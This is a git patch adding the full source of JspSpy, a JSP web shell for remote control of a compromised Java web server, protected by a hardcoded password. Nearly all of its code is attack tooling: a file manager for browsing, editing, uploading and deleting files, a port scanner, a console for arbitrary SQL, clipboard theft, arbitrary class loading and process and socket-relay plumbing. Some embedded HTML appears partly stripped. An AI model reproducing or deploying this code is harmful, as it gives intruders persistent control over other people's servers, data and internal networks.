From 1415965584ef7d5b5c38890688181e3ae6a23a73 Mon Sep 17 00:00:00 2001 From: tennc Date: Mon, 30 Nov 2015 22:54:11 +0800 Subject: [PATCH] Rename t00ls.jsp to t00ls1.jsp --- jsp/t00ls1.jsp | 3294 ++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3294 insertions(+) create mode 100644 jsp/t00ls1.jsp diff --git a/jsp/t00ls1.jsp b/jsp/t00ls1.jsp new file mode 100644 index 0000000..08b3d68 --- /dev/null +++ b/jsp/t00ls1.jsp @@ -0,0 +1,3294 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.lang.reflect.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.util.jar.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! + private static final String PW = "test"; //password + private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; + private static final String REQUEST_CHARSET = "ISO-8859-1"; + private static final String PAGE_CHARSET = "UTF-8"; + private static final String CURRENT_DIR = "currentdir"; + private static final String MSG = "SHOWMSG"; + private static final String PORT_MAP = "PMSA"; + private static final String DBO = "DBO"; + private static final String SHELL_ONLINE = "SHELL_ONLINE"; + private static final String ENTER = "ENTER_FILE"; + private static final String ENTER_MSG = "ENTER_FILE_MSG"; + private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; + private static final String SESSION_O = "SESSION_O"; + private static String SHELL_NAME = ""; + private static String WEB_ROOT = null; + private static String SHELL_DIR = null; + public static Map ins = new HashMap(); + private static boolean ISLINUX = false; + + private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; + private static final String BACK_HREF = " Back"; + + private static class MyRequest extends HttpServletRequestWrapper { + public MyRequest(HttpServletRequest req) { + super(req); + } + public String getParameter(String name) { + try { + String value = super.getParameter(name); + if (name == null) + return null; + return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); + } catch (Exception e) { + return null; + } + } + } + private static class SpyClassLoader extends ClassLoader{ + public SpyClassLoader() { + } + public Class defineClass(String name,byte[] b) { + return super.defineClass(name,b,0,b.length - 2); + } + } + private static class DBOperator{ + private Connection conn = null; + private Statement stmt = null; + private String driver; + private String url; + private String uid; + private String pwd; + public DBOperator(String driver,String url,String uid,String pwd) throws Exception { + this(driver,url,uid,pwd,false); + } + public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { + Class.forName(driver); + if (connect) + this.conn = DriverManager.getConnection(url,uid,pwd); + this.url = url; + this.driver = driver; + this.uid = uid; + this.pwd = pwd; + } + public void connect() throws Exception{ + this.conn = DriverManager.getConnection(url,uid,pwd); + } + public Object execute(String sql) throws Exception { + if (isValid()) { + stmt = conn.createStatement(); + if (stmt.execute(sql)) { + return stmt.getResultSet(); + } else { + return ""+stmt.getUpdateCount(); + } + } + throw new Exception("Connection is inValid."); + } + public void closeStmt() throws Exception{ + if (this.stmt != null) + stmt.close(); + } + public boolean isValid() throws Exception { + return conn != null && !conn.isClosed(); + } + public void close() throws Exception { + if (isValid()) { + closeStmt(); + conn.close(); + } + } + public boolean equals(Object o) { + if (o instanceof DBOperator) { + DBOperator dbo = (DBOperator)o; + return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); + } + return false; + } + public Connection getConn(){ + return this.conn; + } + } + private static class StreamConnector extends Thread { + private InputStream is; + private OutputStream os; + public StreamConnector( InputStream is, OutputStream os ){ + this.is = is; + this.os = os; + } + public void run(){ + BufferedReader in = null; + BufferedWriter out = null; + try{ + in = new BufferedReader( new InputStreamReader(this.is)); + out = new BufferedWriter( new OutputStreamWriter(this.os)); + char buffer[] = new char[8192]; + int length; + while((length = in.read( buffer, 0, buffer.length ))>0){ + out.write( buffer, 0, length ); + out.flush(); + } + } catch(Exception e){} + try{ + if(in != null) + in.close(); + if(out != null) + out.close(); + } catch( Exception e ){} + } + public static void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ + new Thread(new Runnable(){ + public void run(){ + while (true) { + try{ + byte[] data = new byte[100]; + int len = localIn.read(data); + while (len != -1) { + remoteOut.write(data,0,len); + len = localIn.read(data); + } + }catch (Exception e) { + break; + } + } + } + }).start(); + } + public static void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ + new Thread(new Runnable(){ + public void run(){ + while(true) { + try{ + byte[] data = new byte[100]; + int len = remoteIn.read(data); + while (len != -1) { + localOut.write(data,0,len); + len = remoteIn.read(data); + } + }catch (Exception e) { + try{ + soc.close(); + remoteSoc.close(); + }catch(Exception ex) { + } + break; + } + } + } + }).start(); + } + } + private static class EnterFile extends File{ + private ZipFile zf = null; + private ZipEntry entry = null; + private boolean isDirectory = false; + private String absolutePath = null; + public void setEntry(ZipEntry e) { + this.entry = e; + } + public void setAbsolutePath(String p) { + this.absolutePath = p; + } + public void close() throws Exception{ + this.zf.close(); + } + public void setZf(String p) throws Exception{ + if (p.toLowerCase().endsWith(".jar")) + this.zf = new JarFile(p); + else + this.zf = new ZipFile(p); + } + public EnterFile(File parent, String child) { + super(parent,child); + } + public EnterFile(String pathname) { + super(pathname); + } + public EnterFile(String pathname,boolean isDir) { + this(pathname); + this.isDirectory = isDir; + } + public EnterFile(String parent, String child) { + super(parent,child); + } + public EnterFile(URI uri) { + super(uri); + } + public boolean exists(){ + return new File(this.zf.getName()).exists(); + } + public File[] listFiles() { + java.util.List list = new ArrayList(); + java.util.List handled = new ArrayList(); + String currentDir = super.getPath(); + currentDir = currentDir.replace('\\','/'); + if (currentDir.indexOf("/") == 0) + { + if (currentDir.length() > 1) + currentDir = currentDir.substring(1); + else + currentDir = ""; + } + Enumeration e = this.zf.entries(); + while (e.hasMoreElements()) + { + ZipEntry entry = (ZipEntry)e.nextElement(); + String eName = entry.getName(); + if (this.zf instanceof JarFile) { + if (!entry.isDirectory()){ + EnterFile ef = new EnterFile(eName); + ef.setEntry(entry); + try{ + ef.setZf(this.zf.getName()); + }catch(Exception ex) { + } + list.add(ef); + } + } else { + if (currentDir.equals("")) { + //zip root directory + if (eName.indexOf("/") == -1 || eName.matches("[^/]+/$")) + { + EnterFile ef = new EnterFile(eName.replaceAll("/","")); + handled.add(eName.replaceAll("/","")); + ef.setEntry(entry); + list.add(ef); + } else { + if (eName.indexOf("/") != -1) { + String tmp = eName.substring(0,eName.indexOf("/")); + if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { + EnterFile ef = new EnterFile(tmp,true); + ef.setEntry(entry); + list.add(ef); + handled.add(tmp); + } + } + } + } else { + if (eName.startsWith(currentDir)) { + if (eName.matches(currentDir+"/[^/]+/?$")) { + //file. + EnterFile ef = new EnterFile(eName); + ef.setEntry(entry); + list.add(ef); + if (eName.endsWith("/")) { + String tmp = eName.substring(eName.lastIndexOf('/',eName.length()-2)); + tmp = tmp.substring(1,tmp.length()-1); + handled.add(tmp); + } + } else { + //dir + try { + String tmp = eName.substring(currentDir.length()+1); + tmp = tmp.substring(0,tmp.indexOf('/')); + if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { + EnterFile ef = new EnterFile(tmp,true); + ef.setAbsolutePath(currentDir+"/"+tmp); + ef.setEntry(entry); + list.add(ef); + handled.add(tmp); + } + } catch (Exception ex) { + } + } + } + } + } + } + return (File[])list.toArray(new File[0]); + } + public boolean isDirectory(){ + return this.entry.isDirectory() || this.isDirectory; + } + public String getParent(){ + return ""; + } + public String getAbsolutePath(){ + return absolutePath != null ? absolutePath : super.getPath(); + } + public String getName(){ + if (this.zf instanceof JarFile) { + return this.getAbsolutePath(); + } else { + return super.getName(); + } + } + public long lastModified(){ + return entry.getTime(); + } + public boolean canRead(){ + return false; + } + public boolean canWrite(){ + return false; + } + public boolean canExecute(){ + return false; + } + public long length(){ + return entry.getSize(); + } + } + private static class OnLineProcess { + private String cmd = "first"; + private Process pro; + public OnLineProcess(Process p){ + this.pro = p; + } + public void setPro(Process p) { + this.pro = p; + } + public void setCmd(String c){ + this.cmd = c; + } + public String getCmd(){ + return this.cmd; + } + public Process getPro(){ + return this.pro; + } + public void stop(){ + this.pro.destroy(); + } + } + private static class OnLineConnector extends Thread { + private OnLineProcess ol = null; + private InputStream is; + private OutputStream os; + private String name; + public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ + this.is = is; + this.os = os; + this.name = name; + this.ol = ol; + } + public void run(){ + BufferedReader in = null; + BufferedWriter out = null; + try{ + in = new BufferedReader( new InputStreamReader(this.is)); + out = new BufferedWriter( new OutputStreamWriter(this.os)); + char buffer[] = new char[128]; + if(this.name.equals("exeRclientO")) { + //from exe to client + int length = 0; + while((length = in.read( buffer, 0, buffer.length ))>0){ + String str = new String(buffer, 0, length); + str = str.replaceAll("&","&").replaceAll("<","<").replaceAll(">",">"); + str = str.replaceAll(""+(char)13+(char)10,"
"); + str = str.replaceAll("\n","
"); + out.write(str.toCharArray(), 0, str.length()); + out.flush(); + } + } else { + //from client to exe + while(true) { + while(this.ol.getCmd() == null) { + Thread.sleep(500); + } + if (this.ol.getCmd().equals("first")) { + this.ol.setCmd(null); + continue; + } + this.ol.setCmd(this.ol.getCmd() + (char)10); + char[] arr = this.ol.getCmd().toCharArray(); + out.write(arr,0,arr.length); + out.flush(); + this.ol.setCmd(null); + } + } + } catch(Exception e){ + } + try{ + if(in != null) + in.close(); + if(out != null) + out.close(); + } catch( Exception e ){ + } + } + } + private static class Table{ + private ArrayList rows = null; + private boolean echoTableTag = false; + public void setEchoTableTag(boolean v) { + this.echoTableTag = v; + } + public Table(){ + this.rows = new ArrayList(); + } + public void addRow(Row r) { + this.rows.add(r); + } + public String toString(){ + StringBuffer html = new StringBuffer(); + if (echoTableTag) + html.append(""); + for (int i = 0;i"); + ArrayList columns = r.getColumns(); + for (int a = 0;a"); + String vv = Util.htmlEncode(Util.getStr(c.getValue())); + if (vv.equals("")) + vv = " "; + html.append(vv); + html.append(""); + } + html.append(""); + } + if (echoTableTag) + html.append("
"); + return html.toString(); + } + public static String rs2Table(ResultSet rs,String sep,boolean op) throws Exception{ + StringBuffer table = new StringBuffer(); + ResultSetMetaData meta = rs.getMetaData(); + int count = meta.getColumnCount(); + if (!op) + table.append(" View Struct - View All Tables

"); + else + table.append(" All Tables

"); + table.append(""); + table.append(""); + for (int i = 1;i<=count;i++) { + table.append(""); + } + if (op) + table.append(""); + table.append(""); + while (rs.next()) { + String tbName = null; + table.append(""); + for (int i = 1;i<=count;i++) { + String v = rs.getString(i); + if (i == 3) + tbName = v; + table.append(""); + } + if (op) + table.append(""); + table.append(""); + } + table.append("
"+meta.getColumnName(i)+" 
"+Util.null2Nbsp(v)+" View | Struct | Export | Save To File

"); + return table.toString(); + } + } + private static class Row{ + private ArrayList cols = null; + public Row(){ + this.cols = new ArrayList(); + } + public void addColumn(Column n) { + this.cols.add(n); + } + public ArrayList getColumns(){ + return this.cols; + } + } + private static class Column{ + private String value; + public Column(String v){ + this.value = v; + } + public String getValue(){ + return this.value; + } + } + private static class Util{ + public static boolean isEmpty(String s) { + return s == null || s.trim().equals(""); + } + public static boolean isEmpty(Object o) { + return o == null || isEmpty(o.toString()); + } + public static String getSize(long size,char danwei) { + if (danwei == 'M') { + double v = formatNumber(size / 1024.0 / 1024.0,2); + if (v > 1024) { + return getSize(size,'G'); + }else { + return v + "M"; + } + } else if (danwei == 'G') { + return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; + } else if (danwei == 'K') { + double v = formatNumber(size / 1024.0,2); + if (v > 1024) { + return getSize(size,'M'); + } else { + return v + "K"; + } + } else if (danwei == 'B') { + if (size > 1024) { + return getSize(size,'K'); + }else { + return size + "B"; + } + } + return ""+0+danwei; + } + public static boolean exists(String[] arr,String v) { + for (int i =0;i",">"); + } + public static String getStr(String s) { + return s == null ? "" :s; + } + public static String null2Nbsp(String s) { + if (s == null) + s = " "; + return s; + } + public static String getStr(Object s) { + return s == null ? "" :s.toString(); + } + public static String exec(String regex, String str, int group) { + Pattern pat = Pattern.compile(regex); + Matcher m = pat.matcher(str); + if (m.find()) + return m.group(group); + return null; + } + public static void outMsg(Writer out,String msg) throws Exception { + outMsg(out,msg,"center"); + } + public static void outMsg(Writer out,String msg,String align) throws Exception { + out.write("
"+msg+"
"); + } + public static String highLight(String str) { + str = str.replaceAll("\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b","$1"); + str = str.replaceAll("\t(//.+)","\t$1"); + return str; + } + } + private static class UploadBean { + private String fileName = null; + private String suffix = null; + private String savePath = ""; + private ServletInputStream sis = null; + private OutputStream targetOutput = null; + private byte[] b = new byte[1024]; + public void setTargetOutput(OutputStream stream) { + this.targetOutput = stream; + } + public UploadBean() { + } + public void setSavePath(String path) { + this.savePath = path; + } + public String getFileName(){ + return this.fileName; + } + public void parseRequest(HttpServletRequest request) throws IOException { + sis = request.getInputStream(); + int a = 0; + int k = 0; + String s = ""; + while ((a = sis.readLine(b,0,b.length))!= -1) { + s = new String(b, 0, a,PAGE_CHARSET); + if ((k = s.indexOf("filename=\""))!= -1) { + s = s.substring(k + 10); + k = s.indexOf("\""); + s = s.substring(0, k); + File tF = new File(s); + if (tF.isAbsolute()) { + fileName = tF.getName(); + } else { + fileName = s; + } + k = s.lastIndexOf("."); + suffix = s.substring(k + 1); + upload(); + } + } + } + private void upload() throws IOException{ + try { + OutputStream out = null; + if (this.targetOutput != null) + out = this.targetOutput; + else + out = new FileOutputStream(new File(savePath,fileName)); + int a = 0; + int k = 0; + String s = ""; + while ((a = sis.readLine(b,0,b.length))!=-1) { + s = new String(b, 0, a); + if ((k = s.indexOf("Content-Type:"))!=-1) { + break; + } + } + sis.readLine(b,0,b.length); + while ((a = sis.readLine(b,0,b.length)) != -1) { + s = new String(b, 0, a); + if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { + break; + } + out.write(b, 0, a); + } + if (out instanceof FileOutputStream) + out.close(); + } catch (IOException ioe) { + throw ioe; + } + } + } +%> +<% + SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); + String myAbsolutePath = application.getRealPath(request.getServletPath()); + if (Util.isEmpty(myAbsolutePath)) {//for weblogic + SHELL_NAME = request.getServletPath(); + myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); + SHELL_NAME=request.getContextPath()+SHELL_NAME; + WEB_ROOT = new File(application.getResource("/").getPath()).toString(); + } else { + WEB_ROOT = application.getRealPath("/"); + } + SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); + if (SHELL_DIR.indexOf('/') == 0) + ISLINUX = true; + else + ISLINUX = false; + if (session.getAttribute(CURRENT_DIR) == null) + session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); + request = new MyRequest(request); + if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { + String o = request.getParameter("o"); + if (o != null && o.equals("login")) { + ((Invoker)ins.get("login")).invoke(request,response,session); + return; + } else if (o != null && o.equals("vLogin")) { + ((Invoker)ins.get("vLogin")).invoke(request,response,session); + return; + } else { + ((Invoker)ins.get("vLogin")).invoke(request,response,session); + return; + } + } +%> +<%! + private static interface Invoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; + public boolean doBefore(); + public boolean doAfter(); + } + private static class DefaultInvoker implements Invoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { + } + public boolean doBefore(){ + return true; + } + public boolean doAfter() { + return true; + } + } + private static class ScriptInvoker extends DefaultInvoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""); + + } catch (Exception e) { + + throw e ; + } + } + } + private static class BeforeInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println("JspSpy Private Codz By - Yu-brother"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class AfterInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""); + } catch (Exception e) { + + throw e ; + } + } + } + private static class DeleteBatchInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String files = request.getParameter("files"); + int success = 0; + int failed = 0; + if (!Util.isEmpty(files)) { + String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); + String[] arr = files.split(","); + for (int i = 0;iSuccess , "+failed+" Files Deleted Failed!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class ClipBoardInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""+ + " "+ + " "+ + " "+ + "
"+ + "

System Clipboard »

"+ + "

");
+					try{
+						out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getContents(DataFlavor.stringFlavor).getTransferData(DataFlavor.stringFlavor))));
+					}catch (Exception ex) {
+						out.println("ClipBoard is Empty Or Is Not Text Data !");
+					}
+					out.println("
"+ + " "+ + "

"+ + "
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VPortScanInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String ip = request.getParameter("ip"); + String ports = request.getParameter("ports"); + String timeout = request.getParameter("timeout"); + String banner = request.getParameter("banner"); + if (Util.isEmpty(ip)) + ip = "127.0.0.1"; + if (Util.isEmpty(ports)) + ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; + if (Util.isEmpty(timeout)) + timeout = "2"; + out.println("
"+ + "

PortScan >>

"+ + "
"+ + "

"+ + "IP : Port : Banner Timeout (Second) : "+ + "

"+ + "
"+ + "
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class PortScanInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + ((Invoker)ins.get("vPortScan")).invoke(request,response,JSession); + out.println("
"); + String ip = request.getParameter("ip"); + String ports = request.getParameter("ports"); + String timeout = request.getParameter("timeout"); + String banner = request.getParameter("banner"); + int iTimeout = 0; + if (Util.isEmpty(ip) || Util.isEmpty(ports)) + return; + if (!Util.isInteger(timeout)) { + timeout = "2"; + } + iTimeout = Integer.parseInt(timeout); + Map rs = new LinkedHashMap(); + String[] portArr = ports.split(","); + for (int i =0;i"+sb.toString()+""); + r.close(); + } else { + rs.put(port,"Open"); + } + s.close(); + } catch (Exception e) { + if (e.toString().toLowerCase().indexOf("read timed out")!=-1) { + rs.put(port,"Open <<No Banner!>>"); + if (r != null) + r.close(); + } else { + rs.put(port,"Close"); + } + } + } + out.println("
"); + Set entrySet = rs.entrySet(); + Iterator it = entrySet.iterator(); + while (it.hasNext()) { + Map.Entry e = (Map.Entry)it.next(); + String port = (String)e.getKey(); + String value = (String)e.getValue(); + out.println(ip+" : "+port+" ................................. "+value+"
"); + } + out.println("
"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VConnInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + Object obj = JSession.getAttribute(DBO); + if (obj == null || !((DBOperator)obj).isValid()) { + out.println(" "); + out.println("
"+ + "
"+ + ""+ + "

DataBase Manager »

"+ + ""+ + "

"+ + "Driver:"+ + " "+ + "URL:"+ + ""+ + "UID:"+ + ""+ + "PWD:"+ + ""+ + "DataBase:"+ + " "+ + ""+ + "

"+ + "
"); + } else { + ((Invoker)ins.get("dbc")).invoke(request,response,JSession); + } + } catch (ClassCastException e) { + throw e; + } catch (Exception e) { + + throw e ; + } + } + } + //DBConnect + private static class DbcInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String driver = request.getParameter("driver"); + String url = request.getParameter("url"); + String uid = request.getParameter("uid"); + String pwd = request.getParameter("pwd"); + String sql = request.getParameter("sql"); + String selectDb = request.getParameter("selectDb"); + if (selectDb == null) + selectDb = JSession.getAttribute("selectDb").toString(); + else + JSession.setAttribute("selectDb",selectDb); + Object dbo = JSession.getAttribute(DBO); + if (dbo == null || !((DBOperator)dbo).isValid()) { + if (dbo != null) + ((DBOperator)dbo).close(); + dbo = new DBOperator(driver,url,uid,pwd,true); + } else { + if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { + DBOperator oldDbo = (DBOperator)dbo; + dbo = new DBOperator(driver,url,uid,pwd); + if (!oldDbo.equals(dbo)) { + ((DBOperator)oldDbo).close(); + ((DBOperator)dbo).connect(); + } else { + dbo = oldDbo; + } + } + } + DBOperator Ddbo = (DBOperator)dbo; + JSession.setAttribute(DBO,Ddbo); + if (!Util.isEmpty(request.getParameter("type")) && request.getParameter("type").equals("switch")) { + Ddbo.getConn().setCatalog(request.getParameter("catalog")); + } + Util.outMsg(out,"Connect To DataBase Success!"); + out.println(" "); + out.println("
"+ + "
"+ + ""+ + "

DataBase Manager »

"+ + ""+ + "

"+ + "Driver:"+ + " "+ + "URL:"+ + ""+ + "UID:"+ + ""+ + "PWD:"+ + ""+ + "DataBase:"+ + " "+ + ""+ + "

"+ + "
"); + DatabaseMetaData meta = Ddbo.getConn().getMetaData(); + out.println("
"+ + "

Version : "+meta.getDatabaseProductName()+" , "+meta.getDatabaseProductVersion()+"
URL : "+meta.getURL()+"
Catalog : "+Ddbo.getConn().getCatalog()+"
UserName : "+meta.getUserName()+"

Run SQL query/queries on database / Switch Database : "); + out.println("

"); + if (Util.isEmpty(sql)) { + String type = request.getParameter("type"); + if (Util.isEmpty(type) || type.equals("switch")) { + ResultSet tbs = meta.getTables(null,null,null,null); + out.println(Table.rs2Table(tbs,meta.getIdentifierQuoteString(),true)); + tbs.close(); + } else if (type.equals("struct")) { + String tb = request.getParameter("table"); + if (Util.isEmpty(tb)) + return; + ResultSet t = meta.getColumns(null,null,tb,null); + out.println(Table.rs2Table(t,"",false)); + t.close(); + } + } + } catch (Exception e) { + JSession.setAttribute(MSG,"Some Error Occurred. Please Check Out the StackTrace Follow."+BACK_HREF); + throw e; + } + } + } + private static class ExecuteSQLInvoker extends DefaultInvoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String sql = request.getParameter("sql"); + String db = request.getParameter("selectDb"); + Object dbo = JSession.getAttribute(DBO); + if (!Util.isEmpty(sql)) { + if (dbo == null || !((DBOperator)dbo).isValid()) { + ((Invoker)ins.get("vConn")).invoke(request,response,JSession); + return; + } else { + ((Invoker)ins.get("dbc")).invoke(request,response,JSession); + Object obj = ((DBOperator)dbo).execute(sql); + if (obj instanceof ResultSet) { + ResultSet rs = (ResultSet)obj; + ResultSetMetaData meta = rs.getMetaData(); + int colCount = meta.getColumnCount(); + out.println("Query#0 : "+Util.htmlEncode(sql)+"

"); + out.println(""); + for (int i=1;i<=colCount;i++) { + out.println(""); + } + out.println(""); + Table tb = new Table(); + while(rs.next()) { + Row r = new Row(); + for (int i = 1;i<=colCount;i++) { + String v = null; + try { + v = rs.getString(i); + } catch (SQLException ex) { + v = "<>"; + } + r.addColumn(new Column(v)); + } + tb.addRow(r); + } + out.println(tb.toString()); + out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"

"); + rs.close(); + ((DBOperator)dbo).closeStmt(); + } else { + out.println("affected rows : "+obj+"

"); + } + } + } else { + ((Invoker)ins.get("dbc")).invoke(request,response,JSession); + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class VLoginInvoker extends DefaultInvoker { + public boolean doBefore() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println("jspspy
"+ + ""+ + "

Password: "+ + " "+ + " "+ + " "+ + "
"+ + "

"+ + "
by:Yu-brother"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class LoginInvoker extends DefaultInvoker{ + public boolean doBefore() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String inputPw = request.getParameter("pw"); + if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { + ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); + return; + } else { + JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); + response.sendRedirect(SHELL_NAME); + return; + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class MyComparator implements Comparator{ + public int compare(Object obj1,Object obj2) { + try { + if (obj1 != null && obj2 != null) { + File f1 = (File)obj1; + File f2 = (File)obj2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + return f1.getName().compareTo(f2.getName()); + } else { + return -1; + } + } else { + if (f2.isDirectory()) { + return 1; + } else { + return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase()); + } + } + } + return 0; + } catch (Exception e) { + return 0; + } + } + } + private static class FileListInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { + try { + String path2View = null; + PrintWriter out = response.getWriter(); + String path = request.getParameter("folder"); + String outEntry = request.getParameter("outentry"); + if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { + JSession.removeAttribute(ENTER); + JSession.removeAttribute(ENTER_MSG); + JSession.removeAttribute(ENTER_CURRENT_DIR); + } + Object enter = JSession.getAttribute(ENTER); + File file = null; + if (!Util.isEmpty(enter)) { + if (Util.isEmpty(path)) { + if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) + path = "/"; + else + path = (String)(JSession.getAttribute(ENTER_CURRENT_DIR)); + } + file = new EnterFile(path); + ((EnterFile)file).setZf((String)enter); + JSession.setAttribute(ENTER_CURRENT_DIR,path); + } else { + if (Util.isEmpty(path)) + path = JSession.getAttribute(CURRENT_DIR).toString(); + JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); + file = new File(path); + } + path2View = Util.convertPath(path); + if (!file.exists()) { + throw new Exception(path+"Dont Exists !"); + } + File[] list = file.listFiles(); + Arrays.sort(list,new MyComparator()); + out.println("
"); + String cr = null; + try { + cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); + }catch(Exception e) { + cr = "/"; + } + File currentRoot = new File(cr); + out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

"); + out.println("
"+ + ""+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
Current Directory
"+ + "
"); + out.println(""+ + ""+ + ""+ + ""+ + " "+ + " "+ + " "+ + " "+ + " "+ + ""); + if (file.getParent() != null) { + out.println(""+ + ""+ + ""+ + ""); + } + int dircount = 0; + int filecount = 0; + for (int i = 0;i"+ + ""+ + ""+ + ""+ + ""+ + ""+ + ""); + } else { + filecount++; + out.println(""+ + ""+ + ""+ + ""+ + ""+ + ""+ + ""); + } + } + out.println(""+ + " "+ + " "+ + "
"+ + "
"+ + "Web Root"+ + " | Shell Directory"+ + " | New Directory | New File"+ + " | "); + File[] roots = file.listRoots(); + for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); + if (i != roots.length -1) { + out.println("|"); + } + } + out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow"); + if (enter != null) + out.println(" "); + else + out.println("Del | Move | Pack"); + out.println("
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ + ""+f.canRead()+" / "+f.canWrite()+" / unknow "+ + "Edit | "+ + "Down | "+ + "Copy"); + if (enter == null ) { + out.println(" | Move | "+ + "Property | "+ + "Enter"); + if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) { + out.println(" | UnPack"); + } else if (f.getName().endsWith(".rar")) { + out.println(" | UnPack"); + } else { + out.println(" | Pack"); + } + } + out.println("
 "); + if (enter != null) + out.println("Pack Selected - Delete Selected"); + else + out.println("Pack Selected - Delete Selected"); + out.println(""+dircount+" directories / "+filecount+" files
"); + out.println("
